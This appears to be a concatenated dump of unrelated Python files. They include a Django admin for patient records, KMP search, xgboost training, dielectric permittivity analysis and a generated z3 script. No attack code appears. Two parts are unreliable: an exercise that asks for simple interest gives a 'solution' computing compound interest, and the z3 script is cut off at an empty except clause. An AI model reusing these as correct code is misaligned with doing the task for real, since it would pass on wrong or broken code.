'odd': [900, 1500, 2100, 2700],
'even': [1200, 1800, 2400, 2700],
'set': tk.StringVar()
},
'13': {
'normal': [
3000, 3300, 3600, 3900, 4200, 4500, 4800, 5100, 5400,
5700
],
'odd': [3300, 3900, 4500, 5100, 5700],
'even': [3000, 3600, 4200, 4800, 5400],
'set':
tk.StringVar()
},
'14': {
'normal': [6000, 6300, 6600]
},
'15': {
'normal': [900, 1200, 1500, 1800, 2100, 2400, 2700],
'odd': [900, 1500, 2100, 2700],
'even': [1200, 1800, 2400, 2700],
'set': tk.StringVar()
},
'16': {
'normal': [
3000, 3300, 3600, 3900, 4200, 4500, 4800, 5100, 5400,
5700
],
'odd': [3300, 3900, 4500, 5100, 5700],
'even': [3000, 3600, 4200, 4800, 5400],
'set':
tk.StringVar()
},
'17': {
'normal': [6000, 6300, 6600]
},
'18': {
'normal': [900, 1200, 1500, 1800, 2100, 2400, 2700],
'odd': [900, 1500, 2100, 2700],
'even': [1200, 1800, 2400, 2700],
'set': tk.StringVar()
},
'19': {
'normal': [
3000, 3300, 3600, 3900, 4200, 4500, 4800, 5100, 5400,
5700
],
'odd': [3300, 3900, 4500, 5100, 5700],
'even': [3000, 3600, 4200, 4800, 5400],
'set':
tk.StringVar()
},
'20': {
'normal': [6000, 6300, 6600]
},
'21': {
'normal': [900, 1200, 1500, 1800, 2100, 2400, 2700],
'odd': [900, 1500, 2100, 2700],
'even': [1200, 1800, 2400, 2700],
'set': tk.StringVar()
},
'22': {
'normal': [
3000, 3300, 3600, 3900, 4200, 4500, 4800, 5100, 5400,
5700
],
'odd': [3300, 3900, 4500, 5100, 5700],
'even': [3000, 3600, 4200, 4800, 5400],
'set':
tk.StringVar()
},
'23': {
'normal': [6000, 6300, 6600]
},
'24': {
'normal': [900, 1200, 1500, 1800, 2100, 2400, 2700],
'odd': [900, 1500, 2100, 2700],
'even': [1200, 1800, 2400, 2700],
'set': tk.StringVar()
},
'25': {
'normal': [
3000, 3300, 3600, 3900, 4200, 4500, 4800, 5100, 5400,
5700
],
'odd': [3300, 3900, 4500, 5100, 5700],
'even': [3000, 3600, 4200, 4800, 5400],
'set':
tk.StringVar()
},
'26': {
'normal': [6000, 6300, 6600]
},
'27': {
'normal': [900, 1200, 1500, 1800, 2100, 2400, 2700],
'odd': [900, 1500, 2100, 2700],
'even': [1200, 1800, 2400, 2700],
'set': tk.StringVar()
},
'28': {
'normal': [
3000, 3300, 3600, 3900, 4200, 4500, 4800, 5100, 5400,
5700
],
'odd': [3300, 3900, 4500, 5100, 5700],
'even': [3000, 3600, 4200, 4800, 5400],
'set':
tk.StringVar()
},
'29': {
'normal': [6000, 6300, 6600]
}
},
'SIZES': {
'0': '360 PIECES',
'1': '360 PIECES',
'2': '360 PIECES',
'3': '270 PIECES',
'4': '270 PIECES',
'5': '270 PIECES',
'6': '192 PIECES',
'7': '192 PIECES',
'8': '192 PIECES',
'9': '128 PIECES',
'10': '128 PIECES',
'11': '128 PIECES',
'12': '96 PIECES',
'13': '96 PIECES',
'14': '96 PIECES',
'15': '64 PIECES',
'16': '64 PIECES',
'17': '64 PIECES',
'18': '144 PIECES',
'19': '144 PIECES',
'20': '144 PIECES',
'21': '72 PIECES',
'22': '72 PIECES',
'23': '72 PIECES',
'24': '48 PIECES',
'25': '48 PIECES',
'26': '48 PIECES',
'27': '32 PIECES',
'28': '32 PIECES',
'29': '32 PIECES'
},
'DIMENSION': {
'0': '038 x 038',
'1': '038 x 038',
'2': '038 x 038',
'3': '038 x 050',
'4': '038 x 050',
'5': '038 x 050',
'6': '038 x 076',
'7': '038 x 076',
'8': '038 x 076',
'9': '038 x 114',
'10': '038 x 114',
'11': '038 x 114',
'12': '038 x 152',
'13': '038 x 152',
'14': '038 x 152',
'15': '038 x 228',
'16': '038 x 228',
'17': '038 x 228',
'18': '050 x 076',
'19': '050 x 076',
'20': '050 x 076',
'21': '050 x 152',
'22': '050 x 152',
'23': '050 x 152',
'24': '050 x 228',
'25': '050 x 228',
'26': '050 x 228',
'27': '076 x 228',
'28': '076 x 228',
'29': '076 x 228'
},
'ODD_EVEN': {
'_038_038': tk.StringVar(name='_038_038'),
'_038_050': tk.StringVar(name='_038_050'),
'_038_076': tk.StringVar(name='_038_076'),
'_038_114': tk.StringVar(name='_038_114'),
'_038_152': tk.StringVar(name='_038_152'),
'_038_228': tk.StringVar(name='_038_228'),
'_050_076': tk.StringVar(name='_050_076'),
'_050_152': tk.StringVar(name='_050_152'),
'_050_228': tk.StringVar(name='_050_228'),
'_076_228': tk.StringVar(name='_076_228'),
}
}
|
995,244 | 87fdd8475ed7adc0495792c3a86d31a8f2826447 | from django.contrib import admin
from django.utils.html import format_html
from .models import pacientes,areastrabajo,domicilios,acompanantes,metanticonceptivos,edocivil,tipoconsultas,valoraciontanner,expedientes,consultagral,antescolares,antfamiliares,antpatheredofam,antrecreathab,antsex,exploracionfisica,personalidad,repevaluacionpsic,repevaluacionmed,repevolucionpsic#,usuarios
#Creacion de clases para visualizar los datos de la DB, en lugar de que se visualicen como objetos de Modelo
class areastrabajoAdmin(admin.ModelAdmin):
list_display = ("Id_Area","NombreArea")
class usuariosAdmin(admin.ModelAdmin):
list_display = ("Nombre","Apellidos","Id_Area","Mail","Telefono")
search_fields = ("Nombre","Apellidos")
list_filter = ("Id_Area",)
class expedientesAdmin(admin.ModelAdmin):
list_display = ("Id_Exped","CURP")
search_fields = ("CURP",)
raw_id_fields = ("CURP",)
class pacientesAdmin(admin.ModelAdmin):
list_display = ("Nombre_Pac","Apellidos_Pac","FechaNac", "Peso", "Talla","CURP","Telefono","Sexo","Id_EdoCivil")
search_fields = ("Nombre_Pac","Apellidos_Pac","CURP")
list_filter = ("Sexo",)
raw_id_fields = ("Id_EdoCivil",)
class domiciliosAdmin(admin.ModelAdmin):
list_display = ("Id_Domicilio","CURP","Calle","NumInt","NumExt","Colonia","CP","Municipio","Estado")
search_fields = ("CURP",)
raw_id_fields = ("CURP",)
class edocivilAdmin(admin.ModelAdmin):
list_display = ("Id_EdoCivil","Nombre_EdoCivil")
class consultagralAdmin(admin.ModelAdmin):
list_display = ("FolioConsulta","FechaConsulta","CURP_id","Id_Acomp_id","Id_Exped_id","Id_TipoConsulta_id","UserID")
raw_id_fields = ("CURP_id","Id_Acomp_id","Id_Exped_id","Id_TipoConsulta_id")
class antescolaresAdmin(admin.ModelAdmin):
list_display = ("id","FolioConsulta_id","Grado","Promedio","RepitioGrado","DesercionEsc","Causa_DesercionEsc","ConflictProf","Causa_ConflictProf","RelacionComp","TrabajoAnt","Obs_TrabajoAnt","TrabajoActual")
raw_id_fields = ("FolioConsulta_id",)
class antfamiliaresAdmin(admin.ModelAdmin):
list_display = ("id","FolioConsulta_id","Grado","EdadPadre","EdadMadre","EscPadre","EscMadre","EstatusPadres","Id_EdoCivil_id","NumHermanos","Lugar_NumHermanos","PrefPaterna","Obs_PrefPaterna","PrefHermano","Obs_PrefHermano")
raw_id_fields = ("FolioConsulta_id",)
class antpatheredofamAdmin(admin.ModelAdmin):
list_display = ("id","FolioConsulta_id","Diabeticos","Hipertensivos","Oncologicos","Neurologicos","Alergicos","Transfuncionales","Obesidad","ITS","SIDA","Reumaticos","Quirurgicos","Tabaquismo","Alcoholismo","Drogadiccion","Obs_Antpatheredofam")
raw_id_fields = ("FolioConsulta_id",)
class antrecreathabAdmin(admin.ModelAdmin):
list_display = ("id","FolioConsulta_id","PractDeporte","Comp_Prac","Frecuencia","GrupoConviv","Hrs_TVDia","Hrs_PCDia","Hrs_CelDia","Hrs_SuenoDia","Insomnio","Enuresis","Pesadillas","Obs_ConflicSueno","ComidasDia","ComidasDia_Fam","TipoAlim","Alcoholismo","Tabaquismo","Drogadiccion")
raw_id_fields = ("FolioConsulta_id",)
class antsexAdmin(admin.ModelAdmin):
list_display = ("id","FolioConsulta_id","Menarca","Ritmo","FUM","Gesta","Para","Cesarea","Aborto","Dismenorrea","Espermarca","Inicio_ActSex","UsoAnticonc","Id_Metodo_id")
raw_id_fields = ("FolioConsulta_id",)
class exploracionfisicaAdmin(admin.ModelAdmin):
list_display = ("id","FolioConsulta_id","Pulso","FrecCard","FrecResp","Temp","IndMC","TensArt","Obs_Cabeza","Obs_Cuello","Obs_Torax","Obs_Abdomen","ObsGenitales","Id_ValTanner_id")
raw_id_fields = ("FolioConsulta_id",)
class personalidadAdmin(admin.ModelAdmin):
list_display = ("id","FolioConsulta_id","PeriodoTristeza","Frecuencia_PT","Duracion_PT","ConsidFelicidad","Obs_ConsidFelicidad","AceptacionFisica","Obs_AceptacionFisica","OpinionPersonal","CompReligPadres","Religion","Conflictivo","Frecuencia_Conflic","ConflicFamEsc","ReaccionAgresion")
raw_id_fields = ("FolioConsulta_id",)
class repevaluacionmedAdmin(admin.ModelAdmin):
list_display = ("id","FolioConsulta_id","CURP_id","Obs_RepMed")
raw_id_fields = ("FolioConsulta_id","CURP_id")
class repevaluacionpsicAdmin(admin.ModelAdmin):
list_display = ("id","FichaIndent","FolioConsulta_id","CURP_id","Escolaridad","Lateridad","MotConsulta","PadecimientoAct","AspectoComportGral","PruebasAplic","ResultadoPrelim","DiagTratam")
raw_id_fields = ("FolioConsulta_id","CURP_id")
class repevolucionpsicAdmin(admin.ModelAdmin):
list_display = ("id","FolioConsulta_id","CURP_id","ResumenClin","PlanTerap","Tratamiento")
raw_id_fields = ("FolioConsulta_id","CURP_id")
class acompanantesAdmin(admin.ModelAdmin):
list_display = ("Id_Acomp","Nombre_Acomp")
class metanticonceptivosAdmin(admin.ModelAdmin):
list_display = ("Id_Metodo","NombreMetodo")
class tipoconsultasAdmin(admin.ModelAdmin):
list_display = ("Id_TipoConsulta","Nombre_TipoConsulta")
class valoraciontannerAdmin(admin.ModelAdmin):
search_fields = ("NombreValTanner",)
def image_tag(self, obj):
if obj.Img_ValTanner != None:
return format_html('<img width="135" height="85" src="/media/{}" />'.format(obj.Img_ValTanner))
else:
return format_html('<img width="135" height="85" src="/static/images/logo_HPcaaps.png" />')
image_tag.short_description = "Imagen"
readonly_fields = ['image_tag']
list_display = ("Id_ValTanner","image_tag","NombreValTanner", "DescripcionValTanner")
# Register your models here.
#Registro de los modelos migrados para crear las Vistas en el Administrador del Sitio
admin.site.register(areastrabajo,areastrabajoAdmin)
#admin.site.register(usuarios,usuariosAdmin)
admin.site.register(consultagral,consultagralAdmin)
admin.site.register(acompanantes,acompanantesAdmin)
admin.site.register(antescolares,antescolaresAdmin)
admin.site.register(antfamiliares,antfamiliaresAdmin)
admin.site.register(antpatheredofam,antpatheredofamAdmin)
admin.site.register(antrecreathab,antrecreathabAdmin)
admin.site.register(antsex,antsexAdmin)
admin.site.register(exploracionfisica,exploracionfisicaAdmin)
admin.site.register(personalidad,personalidadAdmin)
admin.site.register(repevaluacionpsic,repevaluacionpsicAdmin)
admin.site.register(repevaluacionmed,repevaluacionmedAdmin)
admin.site.register(repevolucionpsic,repevolucionpsicAdmin)
admin.site.register(metanticonceptivos,metanticonceptivosAdmin)
admin.site.register(tipoconsultas,tipoconsultasAdmin)
admin.site.register(valoraciontanner,valoraciontannerAdmin)
admin.site.register(expedientes,expedientesAdmin)
admin.site.register(pacientes,pacientesAdmin)
admin.site.register(domicilios,domiciliosAdmin)
admin.site.register(edocivil,edocivilAdmin) |
995,245 | a73e104c4b357486af5ab19dd51dc04ec796c473 | 11) WPP to enter principle amount, rate of interest, and no of years. Create simple_interest(principle,rate,time). To calculate simple interest.
Solution:
p=int(input("Enter principle amount : "))
r=int(input("Enter rate of interest : "))
y=int(input("Enter number of years : "))
amount = 0
def compint (p,r,y) :
amount=p*((1+float(r)/100)**y)
interest=amount-p
print ("Compound interest is : ",interest)
return
compint (p,r,y)
|
995,246 | 00a84a1f17a92c81cc265fd98d13fd915d9022b7 | class Solution(object):
def strStr(self, haystack, needle):
if not needle:
return 0
return self.KMP(haystack, needle)
def getPrefix(self, pattern):
prefix = [-1]*len(pattern)
j = -1
for i in xrange(1, len(pattern)):
while j > -1 and pattern[j+1] != pattern[i]:
j = prefix[j]
if pattern[j + 1] == pattern[i]:
j += 1
prefix[i] = j
return prefix
def KMP(self, text, pattern):
prefix = self.getPrefix(pattern)
j = -1
for i in xrange(len(text)):
while j > -1 and pattern[j+1] != text[i]:
j = prefix[j]
if pattern[j+1] == text[i]:
j += 1
if j == len(pattern) - 1:
return i - j
return -1
#test
sol = Solution()
print sol.strStr("abababcdab","ababcd")
print sol.getPrefix("aaaa")
|
995,247 | 75ab7c990f6b93fb1dcde15f7dbaf60a6e7f91ae | """
File: SplitDataset
Author: Emre Sรผlรผn
Date: 20.04.2019
Project: Sign_Language_Detector
Description: Splits images into train and test folders. Split ratio is determined by TRAIN_SIZE variable
"""
import os
import shutil
import string
source = '../../samples'
trainDestination = '../../samples/train'
testDestination = '../../samples/test'
TRAIN_SIZE = 68
# Firstly, merge all files into samples folder
oldTrainFiles = os.listdir(trainDestination)
for f in oldTrainFiles:
f = trainDestination + "/" + f
shutil.move(f, source)
oldTestFiles = os.listdir(testDestination)
for f in oldTestFiles:
f = testDestination + "/" + f
shutil.move(f, source)
# Then, distribute files into train and test folders
chars = {}
for char in string.ascii_uppercase:
chars[char] = TRAIN_SIZE
files = os.listdir(source)
for f in files:
letter = f[0]
if letter == 't': # Skip test and train folders
continue
if chars[letter] > 0:
f = source + "/" + f
shutil.move(f, trainDestination)
chars[letter] = chars[letter] - 1
files = os.listdir(source)
for f in files:
letter = f[0]
if letter == 't': # Skip test and train folders
continue
f = source + "/" + f
shutil.move(f, testDestination)
|
995,248 | 62959220ec5893b47cf711945611d2228a0b41c1 | __version__ = '0.1.1'
from django.contrib.auth.hashers import make_password
class LogonMixin(object):
def get_user(self):
from django.contrib.auth.models import User
return User.objects.create(
username='admin',
password=make_password('password'),
)
def setUp(self):
super(LogonMixin, self).setUp()
self.user = self.get_user()
try: # Django >= 1.9
self.client.force_login(self.user)
except AttributeError:
assert self.client.login(username='admin', password='password')
|
995,249 | f417d6095cd1e36f8b2989b0f43f12083e317648 | import numpy as np
import itertools
from matplotlib import pyplot as plt
from os import listdir
from os.path import join, isfile
import Utils
from Sampling import PermSampling
class PermAnalysisTool(object):
def __init__(self, dirs, dispFiles):
# Add dirs and temps as class variables
assert dirs # make sure that the list is not empty
self.dirs = dirs
self.disps = dispFiles
self.labels = [', '.join(x.split('/')[1:]) for x in dirs]
self.ndirs = len(self.dirs)
assert self.ndirs == len(self.disps)
# Initialise denSampling
self.permSampling = PermSampling()
def plotSamplePerms(self, numberOfFiles, terminal, anharmonicity=False, anhFreqFiles=[], index=(0, 0)):
if anharmonicity:
figname = 'permittivity_anh_{}_({}_{}).pdf'.format(numberOfFiles, index[0], index[1])
else:
anhFreqFiles = [''] * self.ndirs
figname = 'permittivity_har_{}_({}_{}).pdf'.format(numberOfFiles, index[0], index[1])
self.findPerms(numberOfFiles, anharmonicity, anhFreqFiles, index)
fig, (ax1, ax2) = plt.subplots(2, sharex=True, sharey=True)
markercycle = itertools.cycle(('.', 'x', '+', '*', 's'))
for n in range(self.ndirs):
label = self.dirs[n].split('/')[-3]
marker = next(markercycle)
ax1.plot(self.electronPerms[n], marker=marker, mew=2, ls='--', lw=1.5, label=label, alpha=0.7)
ax2.plot(self.phononPerms[n], marker=marker, mew=2, ls='--', lw=1.5, label=label, alpha=0.7)
ax1.legend(loc='lower right', prop={'size':10})
ax2.legend(loc='upper right', prop={'size':10})
ax1.set_ylabel('Electron Permittivity')
ax2.set_ylabel('Phonon Permittivity')
ax2.set_xlabel('Sample Number')
ax1.set_title('Electron and phonon permittivity matrix element ({}, {})'.format(index[0], index[1]))
plt.setp([a.get_xticklabels() for a in fig.axes[:-1]], visible=False)
plt.savefig(join(terminal, figname))
plt.close()
def findPerms(self, numberOfFiles, anharmonicity, anhFreqFiles, index):
self.electronPerms = np.zeros((self.ndirs, numberOfFiles))
self.phononPerms = np.zeros((self.ndirs, numberOfFiles))
for n in range(self.ndirs):
d = self.dirs[n]
disp = self.disps[n]
self.permSampling.addDirectory(d)
self.permSampling.initialise(disp)
if anharmonicity:
self.permSampling.anhFreq(anhFreqFiles[n])
for i in range(numberOfFiles):
ele, pho = self.permSampling.readPerm(i)
self.electronPerms[n, i] = ele[index]
self.phononPerms[n, i] = pho[index]
def getPermittivities(self, update=True, anharmonicity=False, anhFreqFiles=[], numberOfFiles=0):
self.electronPerm = np.zeros((self.ndirs, 3, 3))
self.phononPerm = np.zeros((self.ndirs, 3, 3))
self.staticPerm = np.zeros((self.ndirs, 3, 3))
self.anharmonicity = anharmonicity
if not anharmonicity:
anhFreqFiles = [''] * self.ndirs
if numberOfFiles == 0:
self.numberLabel = 'all'
else:
self.numberLabel = '{}'.format(numberOfFiles)
for n in range(self.ndirs):
d = self.dirs[n]
disp = self.disps[n]
self.permSampling.addDirectory(d)
self.permSampling.initialise(disp)
self.permSampling.average(update=update, save=True, anharmonicity=anharmonicity,
anhFreqFile=anhFreqFiles[n], numberOfFiles=numberOfFiles)
self.electronPerm[n] = self.permSampling.electronPerm
self.phononPerm[n] = self.permSampling.phononPerm
self.staticPerm[n] = self.permSampling.staticPerm
def saveSummary(self, terminal):
if self.anharmonicity:
filename = 'permittivity_anh_{}.summary'.format(self.numberLabel)
else:
filename = 'permittivity_har_{}.summary'.format(self.numberLabel)
f = open(join(terminal, filename), 'w')
f.write('Anharmonicity: {} \n'.format(self.anharmonicity))
f.write('Files averaged over: {} \n \n'.format(self.numberLabel))
for (i, label) in enumerate(self.labels):
f.write(' ===================== ้พดโโกโ้พด ===================== \n ')
f.write('Label: {} \n \n'.format(label))
f.write('Electron Contribution: \n')
f.write(np.array2string(self.electronPerm[i], precision=4))
f.write('\n')
f.write('Phonon Contribution: \n')
f.write(np.array2string(self.phononPerm[i], precision=4))
f.write('\n')
f.write('Permittivity: \n')
f.write(np.array2string(self.staticPerm[i], precision=4))
f.write('\n')
eigenvalues = np.linalg.eigvals(self.staticPerm[i])
f.write(np.array2string(eigenvalues))
f.write('\n')
f.write('Geometrical Average: {}'.format(np.prod(eigenvalues) ** (1/3)))
f.write('\n')
f.close()
@classmethod
def diffSummary(cls, tool1, tool2, terminal):
'''
compute the difference between tool1 and tool2, provided that they have the same number of dirs,
and save to terminal on the file system
'''
assert np.all(tool1.staticPerm.shape == tool2.staticPerm.shape)
assert tool1.anharmonicity == tool2.anharmonicity
electronPermDiff = tool1.electronPerm - tool2.electronPerm
phononPermDiff = tool1.phononPerm - tool2.phononPerm
staticPermDiff = tool1.staticPerm - tool2.staticPerm
anharmonicity = tool1.anharmonicity
if anharmonicity:
filename = 'permittivity_diff_anh.summary'
else:
filename = 'permittivity_diff_har.summary'
f = open(join(terminal, filename), 'w')
f.write('Anharmonicity: {} \n \n'.format(anharmonicity))
for (i, label) in enumerate(tool1.labels):
f.write(' ===================== ้พดโโกโ้พด ===================== \n ')
f.write('Label: {} \n \n'.format(label))
f.write('Difference in Electron Contribution: \n')
f.write(np.array2string(electronPermDiff[i], precision=4))
f.write('\n')
f.write('Difference in Phonon Contribution: \n')
f.write(np.array2string(phononPermDiff[i], precision=4))
f.write('\n')
f.write('Difference in Permittivity: \n')
f.write(np.array2string(staticPermDiff[i], precision=4))
f.write('\n')
eigenvalues = np.linalg.eigvals(staticPermDiff[i])
f.write(np.array2string(eigenvalues))
f.write('\n')
f.write('Geometrical Average of difference: {}'.format(np.prod(eigenvalues) ** (1/3)))
f.write('\n')
f.close()
if __name__ == '__main__':
# ======================
# Temperature Dependence
# ======================
temperatures = ['static', '0K', '100K', '240K']
dirs = [join('../Efield/IceIh_Cmc21/output', x) for x in temperatures]
dispFile = [join('../Efield/IceIh_Cmc21/input_files', 'disp_patterns.dat')] * len(dirs)
anhFile = [join('../Efield/IceIh_Cmc21/anharmonic_eigen', 'anharmonic_eigenvalues.dat')] * len(dirs)
terminal = '../Results/Efield/Temperature'
tool = PermAnalysisTool(dirs, dispFile)
tool.getPermittivities(update=False, anharmonicity=False, anhFreqFiles=anhFile)
tool.saveSummary(terminal)
# =============
# Proton Orders
# =============
protonorders = ['IceIh_C1c1', 'IceIh_Cmc21', 'IceIh_Pna21']
temperatures = ['static', '0K']
dispFiles = [join('../Efield', protonorder, 'input_files', 'disp_patterns.dat')
for protonorder in protonorders]
anhFiles = [join('../Efield', protonorder, 'anharmonic_eigen', 'anharmonic_eigenvalues.dat')
for protonorder in protonorders]
dir_static = [join('../Efield', protonorder, 'output', temperatures[0])
for protonorder in protonorders]
dir_0K = [join('../Efield', protonorder, 'output', temperatures[1])
for protonorder in protonorders]
terminal = '../Results/Efield/ProtonOrders/Temperature'
tool1 = PermAnalysisTool(dir_static, dispFiles)
tool1.getPermittivities(update=False, anharmonicity=False, anhFreqFiles=anhFiles)
tool1.saveSummary(join(terminal, temperatures[0]))
tool2 = PermAnalysisTool(dir_0K, dispFiles)
tool2.getPermittivities(update=False, anharmonicity=False, anhFreqFiles=anhFiles)
tool2.saveSummary(join(terminal, temperatures[1]))
number = 10
for i in range(3):
tool2.plotSamplePerms(number, terminal, anharmonicity=False, anhFreqFiles=anhFiles, index=(i, i))
PermAnalysisTool.diffSummary(tool1, tool2, terminal)
# ===========
# Functionals
# ===========
functionals = ['LDA', 'PBE', 'PBE_TS']
temperatures = ['static', '0K']
dispFiles = [join('../Functionals', 'LDA', 'input_files', 'disp_patterns.dat')] * len(functionals)
anhFiles = [join('../Functionals', 'LDA', 'anharmonic_eigen', 'anharmonic_eigenvalues.dat')] * len(functionals)
dir_static = [join('../Functionals', functional, 'output', temperatures[0]) for functional in functionals]
dir_0K = [join('../Functionals', functional, 'output', temperatures[1]) for functional in functionals]
terminal = '../Results/Efield/Functionals'
# For ground state energy
tool1 = PermAnalysisTool(dir_static, dispFiles)
tool1.getPermittivities(update=False, anharmonicity=False, anhFreqFiles=anhFiles, numberOfFiles=0)
tool1.saveSummary(join(terminal, temperatures[0]))
# For 0k
tool2 = PermAnalysisTool(dir_0K, dispFiles)
number = 1
tool2.getPermittivities(update=False, anharmonicity=False, anhFreqFiles=anhFiles, numberOfFiles=number)
tool2.saveSummary(join(terminal, temperatures[1]))
number = 2
tool2.getPermittivities(update=False, anharmonicity=False, anhFreqFiles=anhFiles, numberOfFiles=number)
tool2.saveSummary(join(terminal, temperatures[1]))
number = 10
for i in range(3):
tool2.plotSamplePerms(number, terminal, anharmonicity=False, anhFreqFiles=anhFiles, index=(i, i)) # plot the diagonal elements
number = 20
tool2.getPermittivities(update=False, anharmonicity=False, anhFreqFiles=anhFiles, numberOfFiles=number)
tool2.saveSummary(join(terminal, temperatures[1]))
# Compare the difference between ground state and 0K
PermAnalysisTool.diffSummary(tool1, tool2, terminal)
|
995,250 | 95519c580450664e0f474778d485acad4b288b0e | import xgboost as xgb
import numpy as np
# feature = 2
RETRAIN = True
TEST = False
submissions = []
for feature in range(3):
x = None
y = None
bst = None
x = np.load('./data/X_train.npy', mmap_mode='r')
y = np.load('./data/Y_train.npy', mmap_mode='r')
y = y[:,feature]
param = {'booster':'gblinear', 'lambda' : 1, 'alpha': 0, 'subsample': 1, 'predictor' : 'cpu_predictor', 'max_depth': 20}
if RETRAIN:
print(f'Training feature {feature}')
size = x.shape[0]
batchSize = 10000
bst = None
iters = size // batchSize + 1
for i in range(iters):
print(f'Iteration {i + 1} of {iters}:')
dTrain = xgb.DMatrix(x[i*batchSize: (i+1)*batchSize], label = y[i*batchSize:(i+1)*batchSize])
print('Training xgboost')
bst = xgb.train(param, dTrain, xgb_model=bst)
dTrain = None
bst.save_model(f'./.cache/xgboost{feature}.model')
else:
bst = xgb.Booster(param)
bst.load_model(f'./.cache/xgboost{feature}.model')
print(f"Predicting feature: {feature}")
if TEST :
x = np.load('./data/X_test.npy', mmap_mode='r')
else:
x = np.load('./data/X_train.npy', mmap_mode='r')
test = xgb.DMatrix(x)
ypred = bst.predict(test)
test = None
'''
import matplotlib.pyplot as plt
testy = y[:predictionSize]
m = testy.max()
plt.scatter(testy, ypred)
plt.plot([0,m],[0, m])
plt.gca().set_aspect('equal', adjustable='box')
plt.show()
'''
submissions.append(ypred)
submissions = np.array(submissions)
submissions = submissions.T
np.savetxt('./data/submission.csv', submissions, delimiter=',')
|
995,251 | 753d6e514f1854df4c1722275ac8057edcbb8f05 | """
ะ ะตะดะธะฝััะฒะตะฝะฝะพะน ัััะพะบะต ะทะฐะฟะธัะฐะฝ ัะตะบัั. ะะปั ะบะฐะถะดะพะณะพ ัะปะพะฒะฐ ะธะท ะดะฐะฝะฝะพะณะพ ัะตะบััะฐ ะฟะพะดััะธัะฐะนัะต, ัะบะพะปัะบะพ ัะฐะท ะพะฝะพ ะฒัััะตัะฐะปะพัั ะฒ ััะพะผ
ัะตะบััะต.
ะะฐะดะฐัั ะฝะตะพะฑั
ะพะดะธะผะพ ัะตัะธัั ั ะธัะฟะพะปัะทะพะฒะฐะฝะธะตะผ ัะปะพะฒะฐัั.
"""
s = "Einstein excelled at math and physics from a young age, reaching a mathematical level years ahead of his peers."\
"The 12 years old Einstein taught himself algebra and Euclidean geometry over a single summer. Einstein also "\
"independently discovered his own original proof of the Pythagorean theorem at age 12. A family tutor Max Talmud "\
"says that after he had given the 12 years old Einstein a geometry textbook, after a short time Einstein had" \
"worked "\
"through the whole book. He thereupon devoted himself to higher mathematics. Soon the flight of his mathematical "\
"genius was so high I could not follow. His passion for geometry and algebra led the 12 years old to become "\
"convinced that nature could be understood as a mathematical structure. Einstein started teaching himself calculus"\
"at 12, and as a 14 years old he says he had mastered integral and differential calculus."
s = s.lower()
s = s.replace(".", "")
s = s.replace(",", "")
lst = s.split()
# print(lst)
dic = {}
for word in lst:
new_dic = {word: lst.count(word)}
dic.update(new_dic)
print(len(dic), dic)
|
995,252 | cd602a8be8c7ee254115322d16a1073f13966f87 | from setuptools import setup
setup(name="slackalarmforwarder", packages=["slackalarmforwarder"], package_dir={'': 'lib'})
|
995,253 | b79214eec2d827445451f075293e7fd8e006869a | """
Definition of TreeNode:
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
"""
class Solution:
# @param {TreeNode} root the root of the binary tree
# @return {List[str]} all root-to-leaf paths
def binaryTreePaths(self, root):
def helper(root, path, result):
if not root.left and not root.right:
result.append("->".join(path + [str(root.val)]))
else:
if root.left: helper(root.left, path + [str(root.val)], result)
if root.right: helper(root.right, path+[str(root.val)], result)
return result
return helper(root, [], []) if root else []
|
995,254 | 393ade8334ac8acd1f77b11fb4f27bf24dd079f3 | import sys
import os
currentdirectory = os.path.dirname(os.path.realpath(__file__))
sys.path.append(currentdirectory+"/packages/setuptools/")
currentdirectory = os.path.dirname(os.path.realpath(__file__))
sys.path.append(currentdirectory+"/packages/z3/python/")
from z3 import *
init(currentdirectory+"/packages/z3")
try:
_p1=Int('_p1')
_p2=Int('_p2')
_n=Int('_n')
_bool=Int('_bool')
arraySort = DeclareSort('arraySort')
_f=Function('_f',IntSort(),IntSort())
_ToReal=Function('_ToReal',RealSort(),IntSort())
_ToInt=Function('_ToInt',IntSort(),RealSort())
_N1=Const('_N1',IntSort())
p1x1=Int('p1x1')
_N2=Const('_N2',IntSort())
_N3=Const('_N3',IntSort())
p2n=Int('p2n')
p2n1=Int('p2n1')
p1n=Int('p1n')
p2x1=Int('p2x1')
_N4=Const('_N4',IntSort())
_n2=Int('_n2')
p1n1=Int('p1n1')
p1i1=Int('p1i1')
_n3=Int('_n3')
p2i1=Int('p2i1')
_n1=Int('_n1')
_n4=Int('_n4')
main=Int('main')
power=Function('power',IntSort(),IntSort(),IntSort())
power=Function('power',RealSort(),RealSort(),RealSort())
_s=Solver()
_s.add(ForAll([_p1],Implies(_p1>=0, power(0,_p1)==0)))
_s.add(ForAll([_p1,_p2],Implies(power(_p2,_p1)==0,_p2==0)))
_s.add(ForAll([_p1],Implies(_p1>0, power(_p1,0)==1)))
_s.add(ForAll([_p1,_p2],Implies(power(_p1,_p2)==1,Or(_p1==1,_p2==0))))
_s.add(ForAll([_p1,_p2],Implies(And(_p1>0,_p2>=0), power(_p1,_p2+1)==power(_p1,_p2)*_p1)))
_s.add(ForAll([_n],Implies(_n>=0, _f(_n)==_n)))
_s.set("timeout",50000)
_s.add(p2n1 == p2n)
_s.add(p1n1 == p1n)
_s.add(p1x1 == ((((((_N2)+(((2)*(((power((5),(_N1)))*(1)))))))+(_N2*_N2)))/(2)))
_s.add(p1i1 == _N2 + 1)
_s.add(p2i1 == _N4)
_s.add(p2x1 == ((((((-_N4)+(((2)*(((power((5),(_N3)))*(1)))))))+(_N4*_N4)))/(2)))
_s.add(_N1 + 1 > p1n)
_s.add(ForAll([_n1],Implies(And(_n1 < _N1,_n1>=0),_f(_n1) + 1 <= p1n)))
_s.add(Or(_N1==0,_N1 <= p1n))
_s.add(_N2 + 1 > p1n)
_s.add(ForAll([_n2],Implies(And(_n2 < _N2,_n2>=0),_f(_n2) + 1 <= p1n)))
_s.add(Or(_N2==0,_N2 <= p1n))
_s.add(_N3 + 1 > p2n)
_s.add(ForAll([_n3],Implies(And(_n3 < _N3,_n3>=0),_f(_n3) + 1 <= p2n)))
_s.add(Or(_N3==0,_N3 <= p2n))
_s.add(_N4 > p2n)
_s.add(ForAll([_n4],Implies(And(_n4 < _N4,_n4>=0),_f(_n4) <= p2n)))
_s.add(Or(_N4==0,_N4 - 1 <= p2n))
_s.add(_N1>=0)
_s.add(_N2>=0)
_s.add(_N3>=0)
_s.add(_N4>=0)
_s.add(((p1n)==(p2n)))
_s.add(Not(((((((((_N2)+(((2)*(((power((5),(_N1)))*(1)))))))+(_N2*_N2)))/(2)))==(((((((-_N4)+(((2)*(((power((5),(_N3)))*(1)))))))+(_N4*_N4)))/(2))))))
except Exception as e:
